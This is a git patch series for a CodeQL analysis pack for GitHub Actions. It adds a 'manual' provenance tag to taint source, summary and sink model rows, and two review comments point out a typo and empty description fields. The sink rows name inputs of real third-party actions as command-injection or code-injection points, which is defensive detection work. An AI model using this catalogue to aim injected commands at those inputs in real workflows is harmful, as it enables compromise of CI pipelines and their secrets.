+ - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.labels_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.title_template", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml
index 299c387c81a..8dcabd1650a 100644
--- a/ql/lib/ext/timheuer_base64-to-file.model.yml
+++ b/ql/lib/ext/timheuer_base64-to-file.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"]
- - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"]
+ - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
+ - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index a7afc090a91..753303b0cb3 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"] + - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 7890668fa87..fb15abce061 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
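Review bot: The description in the `output.ref_branch` row of `tj-actions_branch-names.model.yml` is misspelled as `Branch tirggering workflow run`, and the commit carries the typo into the new row. If this column is surfaced in alert text, the misspelling will be shown to users and will not match searches for the correct word. Suggested row: `- ["tj-actions/branch-names", "*", "output.ref_branch", "Branch triggering workflow run", "manual"]`.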
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", 
"manual"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 1946b78f5fd..8e4938368b8 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index 77706e266fe..61141e5f73b 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml 
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["trilom/file-changes-action", "*", "output.files", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files"]
- - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files"]
+ - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"]
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
index 3072c6f54fd..ae166b1f515 100644
--- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"] - - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"] \ No newline at end of file + - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection", "manual"] + - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection", 
"manual"] + - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index 5fe53ea3d07..a6cc6884389 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"] - - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"] + - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] + - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index d4b083e14d2..c80590e4931 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", ""] + - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index 5e87f6c3b94..a352d6c9ff6 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml 
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
- - ["veracode/veracode-sca", "*", "input.path", "command-injection"]
- - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"]
- - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection", "manual"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
index dbe5d2d542d..6ed71f18215 100644
--- a/ql/lib/ext/wearerequired_lint-action.model.yml
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"]
- - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"]
- - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection", "manual"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
index 9ecbdb6329f..5864c0d0ede 100644
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"]
- - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"]
- - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection", "manual"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 31a1eb5bde9..2a4378d1712 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
index 10920eb6bf5..880b0d606da 100644
--- a/ql/lib/ext/zaproxy_action-baseline.model.yml
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
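Review bot: The source rows in `xt0rted_slash-command-action.model.yml` leave the fourth column as an empty string (`""`), while the other source models in this patch describe where the value comes from (for example `PR changed files` or `Downloaded artifact`). If that column feeds the alert text, findings that start at `output.command-arguments` would presumably give a triager no hint of the untrusted origin. A short description, something like `"Slash command arguments"`, would bring these rows in line with the rest. `tzkhan_pr-update-action.model.yml` has the same empty value for `output.headMatch`.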
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"]
- - ["zaproxy/action-baseline", "*", "input.target", "command-injection"]
- - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"]
- - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"]
\ No newline at end of file
+ - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"]
+ - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"]
+ - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection", "manual"]
+ - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml
index a1d49af0845..fd8172c6ca8 100644
--- a/ql/lib/ext/zaproxy_action-full-scan.model.yml
+++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"]
- - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"]
- - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"]
- - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"]
+ - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"]
+ - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"]
+ - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection", "manual"]
+ - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection", "manual"]
From ae84303facb7861d6d40fc994d2cd4b7f938faee Mon Sep 17 00:00:00 2001
From: jorgectf Date: Thu, 11 Apr 2024 11:25:23 +0200 Subject: [PATCH 0163/1267] Add models for composite actions sinks --- ...ctions_actions-runner-controller.model.yml | 14 ++++++++++++ .../composite-actions/adap_flower.model.yml | 9 ++++++++ .../agoric_agoric-sdk.model.yml | 11 ++++++++++ .../airbnb_lottie-ios.model.yml | 6 +++++ .../airbytehq_airbyte.model.yml | 7 ++++++ .../amazon-ion_ion-java.model.yml | 7 ++++++ .../composite-actions/anchore_grype.model.yml | 6 +++++ .../composite-actions/anchore_syft.model.yml | 6 +++++ .../angular_dev-infra.model.yml | 10 +++++++++ .../ansible_ansible-lint.model.yml | 7 ++++++ .../composite-actions/ansible_awx.model.yml | 7 ++++++ .../apache_arrow-datafusion.model.yml | 6 +++++ .../apache_arrow-rs.model.yml | 7 ++++++ .../composite-actions/apache_arrow.model.yml | 6 +++++ .../apache_bookkeeper.model.yml | 6 +++++ .../composite-actions/apache_brpc.model.yml | 6 +++++ .../apache_camel-k.model.yml | 17 ++++++++++++++ .../composite-actions/apache_camel.model.yml | 11 ++++++++++ .../composite-actions/apache_flink.model.yml | 10 +++++++++ .../composite-actions/apache_nuttx.model.yml | 8 +++++++ .../apache_opendal.model.yml | 9 ++++++++ .../composite-actions/apache_pekko.model.yml | 6 +++++ .../apache_pulsar-helm-chart.model.yml | 12 ++++++++++ .../apache_superset.model.yml | 6 +++++ .../appflowy-io_appflowy.model.yml | 7 ++++++ .../aptos-labs_aptos-core.model.yml | 8 +++++++ .../archivesspace_archivesspace.model.yml | 6 +++++ .../armadaproject_armada.model.yml | 6 +++++ .../composite-actions/armbian_build.model.yml | 14 ++++++++++++ .../auth0_auth0-java.model.yml | 9 ++++++++ .../auth0_auth0.net.model.yml | 8 +++++++ .../auth0_auth0.swift.model.yml | 6 +++++ .../autogluon_autogluon.model.yml | 10 +++++++++ .../composite-actions/avaiga_taipy.model.yml | 6 +++++ .../aws-amplify_amplify-cli.model.yml | 6 +++++ .../aws_amazon-vpc-cni-k8s.model.yml | 7 ++++++ .../aws_karpenter-provider-aws.model.yml | 7 ++++++ 
.../awslabs_amazon-eks-ami.model.yml | 12 ++++++++++ .../awslabs_aws-lambda-rust-runtime.model.yml | 6 +++++ .../azerothcore_azerothcore-wotlk.model.yml | 7 ++++++ .../azure_azure-datafactory.model.yml | 7 ++++++ .../badges_shields.model.yml | 6 +++++ .../balena-io_etcher.model.yml | 6 +++++ .../balena-os_balena-engine.model.yml | 6 +++++ .../ben-manes_caffeine.model.yml | 10 +++++++++ .../composite-actions/bokeh_bokeh.model.yml | 6 +++++ .../botpress_botpress.model.yml | 6 +++++ ...intree_braintree-android-drop-in.model.yml | 8 +++++++ .../braintree_braintree_android.model.yml | 9 ++++++++ .../broadinstitute_gatk.model.yml | 8 +++++++ .../canonical_multipass.model.yml | 7 ++++++ .../chia-network_actions.model.yml | 11 ++++++++++ .../chia-network_chia-blockchain.model.yml | 6 +++++ .../chipsalliance_chisel.model.yml | 7 ++++++ .../chocobozzz_peertube.model.yml | 7 ++++++ .../cilium_cilium-cli.model.yml | 12 ++++++++++ .../composite-actions/cilium_cilium.model.yml | 8 +++++++ .../citusdata_citus.model.yml | 8 +++++++ .../clerk_javascript.model.yml | 10 +++++++++ .../cloud-custodian_cloud-custodian.model.yml | 9 ++++++++ .../cloudflare_workers-sdk.model.yml | 6 +++++ ...cloudfoundry_cloud_controller_ng.model.yml | 6 +++++ .../composite-actions/coder_coder.model.yml | 6 +++++ .../composite-actions/coil-kt_coil.model.yml | 6 +++++ .../commaai_openpilot.model.yml | 8 +++++++ .../conan-io_conan-center-index.model.yml | 7 ++++++ .../corretto_corretto-8.model.yml | 9 ++++++++ .../cosmos_cosmos-sdk.model.yml | 6 +++++ .../composite-actions/coturn_coturn.model.yml | 6 +++++ .../crunchydata_postgres-operator.model.yml | 6 +++++ .../composite-actions/cvc5_cvc5.model.yml | 15 +++++++++++++ .../composite-actions/d2l-ai_d2l-en.model.yml | 9 ++++++++ ...build-check-deploy-gradle-action.model.yml | 12 ++++++++++ .../datadog_dd-trace-dotnet.model.yml | 10 +++++++++ .../datadog_dd-trace-go.model.yml | 9 ++++++++ .../datadog_dd-trace-js.model.yml | 7 ++++++ 
.../datafuselabs_databend.model.yml | 7 ++++++ .../davatorium_rofi.model.yml | 8 +++++++ .../debezium_debezium.model.yml | 6 +++++ .../defenseunicorns_zarf.model.yml | 6 +++++ ...lifiees_demarches-simplifiees.fr.model.yml | 6 +++++ ...of-veterans-affairs_vets-website.model.yml | 6 +++++ .../devexpress_devextreme.model.yml | 8 +++++++ .../diggerhq_digger.model.yml | 9 ++++++++ .../diku-dk_futhark.model.yml | 7 ++++++ .../discourse_.github.model.yml | 6 +++++ .../dnsjava_dnsjava.model.yml | 8 +++++++ .../dotintent_react-native-ble-plx.model.yml | 6 +++++ .../dotnet_docs-tools.model.yml | 6 +++++ .../dotnet_dotnet-monitor.model.yml | 6 +++++ .../dragonflydb_dragonfly.model.yml | 9 ++++++++ .../eksctl-io_eksctl.model.yml | 8 +++++++ .../elastic_apm-agent-dotnet.model.yml | 7 ++++++ .../elastic_apm-agent-java.model.yml | 10 +++++++++ .../elementor_elementor.model.yml | 13 +++++++++++ .../composite-actions/emberjs_data.model.yml | 6 +++++ .../composite-actions/emqx_emqx.model.yml | 8 +++++++ .../eonasdan_tempus-dominus.model.yml | 7 ++++++ .../composite-actions/erlang_otp.model.yml | 7 ++++++ .../esphome_esphome.model.yml | 8 +++++++ .../composite-actions/expensify_app.model.yml | 14 ++++++++++++ .../composite-actions/expo_expo.model.yml | 6 +++++ .../expo_vscode-expo.model.yml | 8 +++++++ ...xternal-secrets_external-secrets.model.yml | 7 ++++++ .../facebook_buck2.model.yml | 6 +++++ .../composite-actions/facebook_flow.model.yml | 6 +++++ .../composite-actions/facebook_yoga.model.yml | 7 ++++++ .../facebookresearch_xformers.model.yml | 10 +++++++++ .../fastly_compute-actions.model.yml | 6 +++++ .../composite-actions/felangel_bloc.model.yml | 9 ++++++++ .../firebase_firebase-ios-sdk.model.yml | 9 ++++++++ .../flaxengine_flaxengine.model.yml | 6 +++++ ...pperdevices_flipperzero-firmware.model.yml | 10 +++++++++ .../composite-actions/fluxcd_flux2.model.yml | 8 +++++++ .../forcedotcom_salesforcedx-vscode.model.yml | 6 +++++ .../fossasia_visdom.model.yml | 7 ++++++ 
.../freckle_stack-action.model.yml | 6 +++++ .../freeradius_freeradius-server.model.yml | 8 +++++++ .../composite-actions/gaphor_gaphor.model.yml | 7 ++++++ .../getsentry_action-release.model.yml | 6 +++++ .../github_codeql-action.model.yml | 10 +++++++++ .../composite-actions/github_ruby.model.yml | 10 +++++++++ .../gittools_gitversion.model.yml | 8 +++++++ .../go-spatial_tegola.model.yml | 7 ++++++ .../goauthentik_authentik.model.yml | 6 +++++ .../godotengine_godot.model.yml | 9 ++++++++ .../composite-actions/google_dagger.model.yml | 6 +++++ .../googleapis_java-cloud-bom.model.yml | 6 +++++ .../googleapis_sdk-platform-java.model.yml | 6 +++++ ...ooglecloudplatform_magic-modules.model.yml | 6 +++++ .../gravitational_teleport.model.yml | 10 +++++++++ .../grote_transportr.model.yml | 6 +++++ .../hashicorp_nomad.model.yml | 6 +++++ .../hashicorp_terraform.model.yml | 10 +++++++++ .../hashicorp_vault.model.yml | 7 ++++++ .../home-assistant_android.model.yml | 8 +++++++ .../homebrew_actions.model.yml | 14 ++++++++++++ ...erledger_aries-cloudagent-python.model.yml | 6 +++++ .../hyperledger_fabric-samples.model.yml | 8 +++++++ .../igniterealtime_openfire.model.yml | 8 +++++++ .../infracost_actions.model.yml | 6 +++++ ...nspektor-gadget_inspektor-gadget.model.yml | 18 +++++++++++++++ .../intel-analytics_ipex-llm.model.yml | 6 +++++ .../ionic-team_ionic-framework.model.yml | 16 ++++++++++++++ .../ionic-team_ionicons.model.yml | 14 ++++++++++++ .../ionic-team_stencil.model.yml | 11 ++++++++++ .../composite-actions/ipfs_aegir.model.yml | 9 ++++++++ .../jetbrains_jetbrainsruntime.model.yml | 6 +++++ .../jhipster_generator-jhipster.model.yml | 22 +++++++++++++++++++ .../jsocol_django-ratelimit.model.yml | 6 +++++ .../juicedata_juicefs.model.yml | 12 ++++++++++ .../jupyter_docker-stacks.model.yml | 8 +++++++ .../keycloak_keycloak.model.yml | 8 +++++++ .../composite-actions/kserve_kserve.model.yml | 8 +++++++ .../kubeflow_katib.model.yml | 10 +++++++++ 
.../kubeflow_training-operator.model.yml | 6 +++++ .../kubernetes-sigs_karpenter.model.yml | 6 +++++ .../kubernetes-sigs_kwok.model.yml | 6 +++++ .../kubescape_kubescape.model.yml | 7 ++++++ .../kubeshop_botkube.model.yml | 7 ++++++ .../kyverno_kyverno.model.yml | 8 +++++++ .../composite-actions/lancedb_lance.model.yml | 9 ++++++++ .../launchdarkly_ios-client-sdk.model.yml | 6 +++++ .../layer5labs_meshmap-snapshot.model.yml | 11 ++++++++++ .../ldc-developers_ldc.model.yml | 15 +++++++++++++ .../ledgerhq_ledger-live.model.yml | 8 +++++++ .../composite-actions/lerna_lerna.model.yml | 6 +++++ .../composite-actions/lf-edge_eve.model.yml | 8 +++++++ .../libgit2_libgit2.model.yml | 12 ++++++++++ .../lightning-ai_pytorch-lightning.model.yml | 13 +++++++++++ .../lightning-ai_torchmetrics.model.yml | 8 +++++++ .../linkerd_linkerd2.model.yml | 9 ++++++++ .../logseq_publish-spa.model.yml | 9 ++++++++ .../macvim-dev_macvim.model.yml | 7 ++++++ .../mamba-org_mamba.model.yml | 8 +++++++ .../maplibre_maplibre-native.model.yml | 16 ++++++++++++++ .../mastodon_mastodon.model.yml | 6 +++++ .../mavlink_qgroundcontrol.model.yml | 8 +++++++ .../mdanalysis_mdanalysis.model.yml | 13 +++++++++++ .../medic_cht-core.model.yml | 8 +++++++ .../medusajs_medusa.model.yml | 8 +++++++ .../metabase_metabase.model.yml | 17 ++++++++++++++ ...etamask_action-create-release-pr.model.yml | 8 +++++++ .../metamask_action-npm-publish.model.yml | 6 +++++ .../microsoft_fluentui.model.yml | 6 +++++ .../microsoft_playwright.model.yml | 11 ++++++++++ .../composite-actions/microsoft_wsl.model.yml | 7 ++++++ .../milvus-io_milvus.model.yml | 6 +++++ .../composite-actions/mlflow_mlflow.model.yml | 6 +++++ .../modin-project_modin.model.yml | 8 +++++++ .../mozilla_addons-server.model.yml | 7 ++++++ .../mozilla_bedrock.model.yml | 6 +++++ .../mozilla_sccache.model.yml | 6 +++++ .../msys2_setup-msys2.model.yml | 6 +++++ .../mumble-voip_mumble.model.yml | 8 +++++++ .../composite-actions/nasa_fprime.model.yml | 6 +++++ 
.../nats-io_nats-server.model.yml | 8 +++++++ ..._optic-release-automation-action.model.yml | 8 +++++++ .../composite-actions/nektos_act.model.yml | 12 ++++++++++ ...4j-contrib_neo4j-apoc-procedures.model.yml | 7 ++++++ .../neondatabase_neon.model.yml | 13 +++++++++++ .../composite-actions/neovim_neovim.model.yml | 6 +++++ .../composite-actions/nhost_nhost.model.yml | 6 +++++ .../nix-community_nixos-wsl.model.yml | 7 ++++++ .../composite-actions/novuhq_novu.model.yml | 6 +++++ .../composite-actions/nymtech_nym.model.yml | 6 +++++ .../obsproject_obs-studio.model.yml | 19 ++++++++++++++++ .../composite-actions/ocaml_dune.model.yml | 10 +++++++++ .../oneflow-inc_oneflow.model.yml | 12 ++++++++++ ...metry_opentelemetry-ruby-contrib.model.yml | 8 +++++++ ...pen-telemetry_opentelemetry-ruby.model.yml | 7 ++++++ .../open-watcom_open-watcom-v2.model.yml | 8 +++++++ .../openapitools_openapi-generator.model.yml | 8 +++++++ .../composite-actions/openjdk_jdk.model.yml | 6 +++++ ...pensearch-project_opensearch-net.model.yml | 8 +++++++ .../opensearch-project_security.model.yml | 6 +++++ .../opentrons_opentrons.model.yml | 12 ++++++++++ .../openvinotoolkit_openvino.model.yml | 16 ++++++++++++++ ...enzeppelin-contracts-upgradeable.model.yml | 12 ++++++++++ ...nzeppelin_openzeppelin-contracts.model.yml | 12 ++++++++++ .../composite-actions/oppia_oppia.model.yml | 6 +++++ .../composite-actions/oracle_graal.model.yml | 7 ++++++ .../oracle_truffleruby.model.yml | 6 +++++ .../orhun_git-cliff.model.yml | 6 +++++ .../composite-actions/oven-sh_bun.model.yml | 7 ++++++ .../owntracks_android.model.yml | 7 ++++++ .../pandas-dev_pandas.model.yml | 8 +++++++ .../pardeike_harmony.model.yml | 9 ++++++++ .../pennylaneai_pennylane.model.yml | 7 ++++++ .../phalcon_cphalcon.model.yml | 13 +++++++++++ .../philosowaffle_peloton-to-garmin.model.yml | 7 ++++++ .../composite-actions/php_php-src.model.yml | 10 +++++++++ .../phpdocumentor_phpdocumentor.model.yml | 7 ++++++ 
...necone-io_pinecone-python-client.model.yml | 10 +++++++++ .../composite-actions/pixijs_pixijs.model.yml | 6 +++++ .../posthog_posthog.model.yml | 7 ++++++ .../composite-actions/primer_react.model.yml | 7 ++++++ .../project-chip_connectedhomeip.model.yml | 8 +++++++ .../projectnessie_nessie.model.yml | 9 ++++++++ .../composite-actions/psf_black.model.yml | 6 +++++ .../pyca_cryptography.model.yml | 6 +++++ .../pyg-team_pytorch_geometric.model.yml | 8 +++++++ .../python-poetry_poetry.model.yml | 6 +++++ .../composite-actions/python_mypy.model.yml | 7 ++++++ .../quarto-dev_quarto-cli.model.yml | 15 +++++++++++++ .../composite-actions/quay_clair.model.yml | 11 ++++++++++ .../quickwit-oss_quickwit.model.yml | 7 ++++++ .../composite-actions/r-lib_actions.model.yml | 18 +++++++++++++++ .../randombit_botan.model.yml | 7 ++++++ .../raspberrypi_documentation.model.yml | 12 ++++++++++ .../ray-project_kuberay.model.yml | 6 +++++ .../readthedocs_actions.model.yml | 10 +++++++++ .../reflex-dev_reflex.model.yml | 6 +++++ .../renovatebot_renovate.model.yml | 6 +++++ .../rethinkdb_rethinkdb.model.yml | 9 ++++++++ .../composite-actions/risc0_risc0.model.yml | 9 ++++++++ .../rocketchat_rocket.chat.model.yml | 9 ++++++++ .../composite-actions/rook_rook.model.yml | 9 ++++++++ .../composite-actions/roots_trellis.model.yml | 6 +++++ .../composite-actions/ruby_debug.model.yml | 6 +++++ 